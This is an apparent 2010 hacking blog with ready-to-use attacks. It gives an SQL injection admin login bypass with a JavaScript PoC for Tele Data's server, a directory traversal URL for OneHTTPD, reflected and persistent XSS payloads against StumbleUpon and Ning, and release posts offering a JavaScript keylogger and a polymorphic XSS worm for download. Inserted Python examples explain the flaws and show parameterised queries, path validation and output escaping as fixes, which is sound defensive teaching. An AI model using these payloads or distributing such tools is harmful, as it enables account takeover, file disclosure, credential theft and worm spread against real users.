Tele Data Contact Management Server doesn't have much in the way of security. It's possible to log in with admin privileges by injecting SQL into the username field. As there are client-side length constraints on the username field, I packaged the exploit in some JavaScript for ease of use.
Exploit: or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--
PoC: javascript:document.forms[0][0].setAttribute("value","' or 1=0 UNION SELECT 1 as RecID,0,'' AS Password,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 FROM Users;--");document.forms[0].submit();
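The login flaw above, rebuilt as an added example (not code from the post or from Tele Data): a constructed four-column stand-in for the Users table, the string-concatenated lookup the payload relies on, and the parameterised version that makes the same payload harmless. The real schema is not on the page, so the payload is trimmed to four columns; Role 2 is assumed to mean admin, and the table stores plaintext passwords only to mirror the legacy comparison the exploit depends on.

```python
import hmac
import sqlite3

# Constructed stand-in for the Tele Data "Users" table (real schema unknown).
# Role 2 is assumed to be the admin role; Password is plaintext only because
# the exploit on the page relies on the app comparing it to '' verbatim.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE Users (RecID INTEGER, Username TEXT, Password TEXT, Role INTEGER)"
    )
    conn.execute("INSERT INTO Users VALUES (1, 'admin', 'correct-horse', 2)")
    return conn

# The page's payload, reduced to the four columns of the stand-in table.
PAYLOAD = "' or 1=0 UNION SELECT 1 AS RecID, 'admin', '' AS Password, 2 FROM Users;--"

def login_vulnerable(conn, username, password):
    """Flawed pattern: username is spliced into the SQL text, then the
    application compares the submitted password with whatever the row says."""
    sql = (
        "SELECT RecID, Username, Password, Role FROM Users WHERE Username = '"
        + username + "'"
    )
    row = conn.execute(sql).fetchone()
    if row is None:
        return None
    # With the UNION row the stored "password" is '' and the submitted one is '',
    # so the check passes and the attacker-chosen Role is returned.
    if row[2] == password:
        return {"RecID": row[0], "Role": row[3]}
    return None

def login_safe(conn, username, password):
    """Parameterised query: the username is bound as data, so the payload is just
    a username that does not exist and no UNION row can be smuggled in."""
    row = conn.execute(
        "SELECT RecID, Username, Password, Role FROM Users WHERE Username = ?",
        (username,),
    ).fetchone()
    if row is None:
        return None
    # Constant-time comparison; hashing the stored password is the next fix.
    if hmac.compare_digest(row[2].encode(), password.encode()):
        return {"RecID": row[0], "Role": row[3]}
    return None

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, PAYLOAD, ""))  # admin session
    print("safe:      ", login_safe(db, PAYLOAD, ""))        # None
```

The client-side length limit the post mentions is not a control at all: the request is built by the attacker, so the only check that counts is the one the server performs, and binding parameters removes the problem rather than filtering around it.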
Wednesday, April 28, 2010
Tuesday, April 27, 2010
OneHTTPD 0.6 Directory Traversal
It's possible to navigate the local file system of a server running OneHTTPD 0.6 by using a specially crafted URL.
http://localhost/%C2../%C2../%C2../%C2../%C2../%C2../%C2../%C2../
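A request-path check that refuses the URL above, added here as an example and not OneHTTPD's code. It decodes percent-escapes exactly once to bytes, rejects anything that is not valid UTF-8 (the stray 0xC2 byte in front of each ".." is exactly that), rejects any ".." segment before touching the filesystem, and finally confirms the normalised path still sits under an assumed document root of /var/www/html.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Assumed document root for the example; the real server's root is not on the page.
DOC_ROOT = "/var/www/html"

def resolve_request_path(url_path, doc_root=DOC_ROOT):
    """Map a request path onto the filesystem, or return None if it must be refused."""
    # Decode percent-escapes once, to raw bytes, so no charset guessing happens
    # before the traversal check (and double-encoded dots stay literal).
    raw = unquote_to_bytes(url_path)
    try:
        # 0xC2 followed by '.' is not valid UTF-8: refuse the request instead of
        # dropping or replacing the byte, which is what lets "../" slip through.
        decoded = raw.decode("utf-8")
    except UnicodeDecodeError:
        return None
    if "\x00" in decoded or "\\" in decoded:
        return None
    segments = [s for s in decoded.split("/") if s not in ("", ".")]
    if any(s == ".." for s in segments):
        return None
    root = posixpath.normpath(doc_root)
    candidate = posixpath.normpath(posixpath.join(root, *segments))
    # Belt and braces: the normalised result must still be inside the root.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate

if __name__ == "__main__":
    for p in ("/index.html", "/%C2../%C2../%C2../etc/passwd", "/../../etc/passwd"):
        print(p, "->", resolve_request_path(p))
```

On a live server, follow this with os.path.realpath on the candidate and repeat the containment check, so that a symlink under the root cannot point outside it.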
Labels:
ASCII,
directory traversal,
hacking,
http server,
onehttpd,
security
Monday, April 26, 2010
Stumbleupon.com Reflected XSS
The code that displays spelling corrections does not encode user submitted data.
http://www.stumbleupon.com/search?q=teh<script>alert(0)</script>
Ning.com Persistent XSS
Less-than and greater-than characters submitted in the descriptions of albums, images and probably other fields are left unencoded. Any tags submitted in such fields are subjected to whitelist validation, but this can be bypassed by prepending a less-than character to the injected open and close tags.
Exploit: <<script>alert(0)//<</script>
PoC: http://coniferous.ning.com/photo/792231134-1
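Both XSS posts above come down to the same defence, so one added example covers them (constructed here, not StumbleUpon's or Ning's code): a spelling-suggestion snippet rendered with and without context-appropriate encoding for the reflected case, and a check built on Python's real HTML tokenizer showing that the Ning payload does contain a script start tag even though a hand-rolled tag scanner may not see one. The snippet layout and the search endpoint are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote_plus

# The two payloads quoted in the posts above.
REFLECTED_PAYLOAD = "teh<script>alert(0)</script>"
PERSISTENT_PAYLOAD = "<<script>alert(0)//<</script>"

def render_suggestion_vulnerable(query):
    """Constructed stand-in for a correction snippet that echoes the query
    into the page unencoded."""
    return f'Did you mean <a href="/search?q={query}">{query}</a>?'

def render_suggestion_safe(query):
    """Same snippet with encoding per context: URL-encoding inside the href,
    HTML-escaping (quotes included) in the attribute and text."""
    return (f'Did you mean <a href="/search?q={quote_plus(query)}">'
            f'{html.escape(query, quote=True)}</a>?')

class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)

def start_tags(fragment):
    """List start tags as a real HTML tokenizer sees them; for '<<script>' the
    first '<' is text and the second opens a script element."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags

def is_inert(fragment):
    """True when no script element survives in the rendered fragment."""
    return "script" not in start_tags(fragment)

if __name__ == "__main__":
    print(start_tags(PERSISTENT_PAYLOAD))                      # ['script']
    print(start_tags(html.escape(PERSISTENT_PAYLOAD)))         # []
    print(render_suggestion_safe(REFLECTED_PAYLOAD))
```

The lesson from the Ning bypass is that validating markup with a scanner that does not match the browser's tokenizer is a losing game; escape on output, and where rich text must be allowed, run it through a sanitizer that parses to a tree and re-serialises only allowed elements rather than passing the original bytes through.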
Sunday, April 25, 2010
Javascript Keylogger 1.4 Released
A Python HTTP server has been added to allow for greater cross-platform compatibility.
Download 1
Download 2
Labels:
C#,
cross-site scripting,
hacking,
html,
http server,
javascript,
keylogger,
keystroke logger,
phishing,
programming,
Python,
security,
xss
Sunday, April 11, 2010
Prion 1.3 Released - Polymorphic XSS Worm
Because of Prion's large memory footprint it isn't suitable for use with every XSS vulnerability. For this reason I decided to create Prion Lite, a scaled-down version of Prion small enough to be used with most XSS vulnerabilities, reflected or persistent. Of course this comes at a cost: unlike Prion, which carries its entire codebase with it, instances of the new Lite version must reference an off-site JavaScript file, another piece of evidence for anyone that might be looking for such things.
1.3 Changes
Cleaned up code
Prion lite added
Mickey mouse encryption algorithm updated (Prion lite only)
Reorder transformation added (Prion lite only)
Miscellaneous bug fixes
Download
Monday, April 5, 2010
Prion 1.2 Released - Polymorphic XSS Worm
Prion 1.2 is out, and it's quite an improvement over the last version. The updated encoding algorithm eliminated a lot of bloat, and the new code transformations make the decryptor of each worm instance unique.
1.2 Changes
Integer splitting transformation added
Variable rename transformation added
Added compressed version
Test UI updated
Download